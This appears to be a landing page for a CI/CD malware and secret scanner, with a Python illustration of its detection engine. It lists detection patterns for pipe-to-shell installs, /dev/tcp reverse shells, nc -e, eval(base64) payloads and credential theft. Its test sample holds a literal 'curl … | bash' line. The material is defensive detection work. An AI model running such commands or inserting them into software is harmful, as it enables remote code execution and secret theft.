An agent-agnostic malware & supply-chain scanner for CI/CD — pure bash + python3 stdlib, zero install. It catches malicious code, leaked secrets and poisoned dependencies before they merge, then gates the build through its exit code. Built in the open by OptinAmpOut.
A single curl … | bash in a postinstall hook, a base64 blob that decodes to a reverse shell, an AWS key committed by accident — supply-chain and malware incidents almost always slip in through code nobody reviewed line-by-line. mal-mon runs that review automatically, on every push, and fails the build when it finds something. The core needs nothing but bash and python3, so it runs anywhere — CI runner, pre-commit hook, or an agent’s sandbox.
scan.sh always runs the dependency-free engine, layers in any richer scanners it finds on the runner, then merges, de-duplicates and ranks — gating the build through its exit code.
- heuristics.py always runs: pattern rules, entropy analysis and base64 payload decoding, no install required.
- If gitleaks, semgrep, trivy, pip-audit or npm are present on the runner, their results are merged in; otherwise they are skipped gracefully.
- Findings are de-duplicated and ranked LOW…CRITICAL, then rendered as text, JSON or SARIF.
- Exit codes: 0 clean · 1 findings at or above the --fail-on threshold · 2 error. The pipeline stops on what matters.
From obvious reverse shells to high-entropy secrets and poisoned install hooks.
- Pipe-to-shell (curl … | bash), /dev/tcp reverse shells, nc -e, crypto miners.
- eval(base64…), Function(atob(…)), hex/charCode blobs, base64 that decodes to executable content.
- pickle.loads, marshal.loads, yaml.load without SafeLoader, node vm.
- Private keys, AWS / GitHub / Slack / Google / Stripe tokens, JWTs, hardcoded creds and high-entropy strings.
- npm pre/postinstall hooks running network/eval; dependency CVEs via trivy / pip-audit / npm-audit.
- Reading ~/.ssh, cloud creds, or env vars posted to the network.
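The built-in engine described above (pattern rules, entropy analysis, base64 decoding, de-duplication, severity ranking and exit-code gating) is easy to model end to end. The following is an added illustration, not mal-mon's heuristics.py: the rule ids, regexes, the 4.5-bit entropy cut-off, the severity assignments and the sample input are all assumptions constructed for the example, and the sample lines are not taken from any real repository.

```python
"""Toy model of a heuristics stage: regex rules, Shannon entropy and
base64-decode-to-executable checks, then de-dup, ranking and exit-code gating.
Added illustration only; rule ids, regexes and thresholds are assumptions."""
import base64
import binascii
import math
import re
import sys

SEVERITIES = ["LOW", "MEDIUM", "HIGH", "CRITICAL"]

# Pattern rules: (hypothetical rule id, regex, severity).
PATTERN_RULES = [
    ("pipe-to-shell", re.compile(r"\b(curl|wget)\b[^|\n]*\|\s*(ba)?sh\b"), "CRITICAL"),
    ("dev-tcp-shell", re.compile(r"/dev/tcp/"), "CRITICAL"),
    ("eval-base64", re.compile(r"\beval\s*\(\s*base64"), "HIGH"),
    ("aws-access-key", re.compile(r"\bAKIA[0-9A-Z]{16}\b"), "HIGH"),
    ("unsafe-pickle", re.compile(r"\bpickle\.loads?\s*\("), "MEDIUM"),
    # yaml.load(...) whose argument list does not mention SafeLoader
    ("unsafe-yaml", re.compile(r"\byaml\.load\s*\((?![^)]*SafeLoader)"), "MEDIUM"),
]
B64_TOKEN = re.compile(r"[A-Za-z0-9+/]{24,}={0,2}")
ENTROPY_TOKEN = re.compile(r"[A-Za-z0-9+/=_-]{20,}")
ENTROPY_THRESHOLD = 4.5          # bits per character; assumed cut-off
EXEC_MARKERS = (b"/bin/sh", b"bash -c", b"eval(")


def shannon_entropy(s: str) -> float:
    """Bits per character; 0.0 for an empty or single-symbol string."""
    if not s:
        return 0.0
    n = len(s)
    return -sum(c / n * math.log2(c / n) for c in (s.count(ch) for ch in set(s)))


def decoded_executable(token: str) -> bool:
    """True if the token is valid base64 whose plaintext looks runnable."""
    try:
        raw = base64.b64decode(token, validate=True)
    except (binascii.Error, ValueError):
        return False                       # not base64 (or bad padding): ignore
    return raw.startswith(b"#!") or any(m in raw for m in EXEC_MARKERS)


def scan_text(text: str) -> list:
    """Return findings de-duplicated on (rule, line), ranked highest severity first."""
    found = {}

    def add(rule, sev, lineno, snippet):
        found.setdefault((rule, lineno), {"rule": rule, "severity": sev,
                                          "line": lineno, "snippet": snippet.strip()})

    for lineno, line in enumerate(text.splitlines(), 1):
        for rule, rx, sev in PATTERN_RULES:
            if rx.search(line):
                add(rule, sev, lineno, line)
        for tok in B64_TOKEN.findall(line):
            if decoded_executable(tok):
                add("base64-executable", "HIGH", lineno, line)
        for tok in ENTROPY_TOKEN.findall(line):
            if shannon_entropy(tok) >= ENTROPY_THRESHOLD:
                add("high-entropy-string", "MEDIUM", lineno, line)
    # sorted() is stable, so equal severities keep file order
    return sorted(found.values(), key=lambda f: SEVERITIES.index(f["severity"]), reverse=True)


def exit_code(findings: list, fail_on: str = "HIGH") -> int:
    """0 clean, 1 findings at/above fail_on, 2 error (unknown severity name)."""
    if fail_on not in SEVERITIES:
        return 2
    floor = SEVERITIES.index(fail_on)
    return 1 if any(SEVERITIES.index(f["severity"]) >= floor for f in findings) else 0


# Constructed sample input. The base64 blob decodes to a two-line shell script
# that echoes "hello world"; the last string is a placeholder "secret" with
# 32 distinct characters (entropy exactly 5.0 bits).
SAMPLE = """\
#!/bin/sh
echo "building"
curl -fsSL https://example.invalid/install.sh | bash
AWS_KEY=AKIAIOSFODNN7EXAMPLE
cfg = yaml.load(raw, Loader=yaml.SafeLoader)
obj = pickle.loads(blob)
payload = "IyEvYmluL3NoCmVjaG8gaGVsbG8gd29ybGQK"
api_secret = "0123456789abcdefghijklmnopqrstuv"
"""

if __name__ == "__main__":
    results = scan_text(SAMPLE)
    for f in results:
        print(f"{f['severity']:<8} line {f['line']:<3} {f['rule']:<20} {f['snippet']}")
    sys.exit(exit_code(results, sys.argv[1] if len(sys.argv) > 1 else "HIGH"))
```

Two details carry over to any real engine: `base64.b64decode(..., validate=True)` rejects near-misses instead of silently decoding garbage, so only genuine base64 is inspected for a shebang or shell marker; and the SafeLoader rule uses a negative lookahead so `yaml.load(raw, Loader=yaml.SafeLoader)` on line 5 of the sample is correctly left alone while a bare `yaml.load(raw)` would still be flagged.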
scan.sh + heuristics.py are all you need. Run it in CI, as a pre-commit hook, or point an agent at it as the /malware-monitor skill.
```bash
# Full scan, fail the build on HIGH or above
./scan.sh --path . --fail-on HIGH

# Pre-commit: only scan staged files
./scan.sh --staged --fail-on MEDIUM

# Machine-readable for GitHub code-scanning
./scan.sh --path . --format sarif --output scan.sarif
```
```yaml
- name: malware-monitor
  run: |
    bash .ci/malware-monitor/scan.sh --path . --fail-on HIGH \
      --format sarif --output results.sarif
- uses: github/codeql-action/upload-sarif@v3
  if: always()
  with: { sarif_file: results.sarif }
```
| Flag | Default | Meaning |
|---|---|---|
| `--path DIR` | `.` | Directory or file to scan. |
| `--staged` | off | Scan only git-staged files (pre-commit). |
| `--fail-on SEV` | `HIGH` | Minimum severity that fails the build. |
| `--format` | `text` | `text` · `json` · `sarif`. |
| `--secrets-only` | off | Run only the secret rules — a fast gate. |
| `--no-optional` | off | Skip external scanners; built-in engine only. |
mal-mon detects and reports — it never executes flagged payloads and never “fixes” or augments malicious code. Scan code you own or are authorized to audit. It’s part of the secure-operations toolchain we run on our own pipelines and our clients’.
We wire malware, secret and supply-chain scanning into CI/CD — and harden the rest of your build path while we’re there. Tell us what you’re shipping.
Book a build call →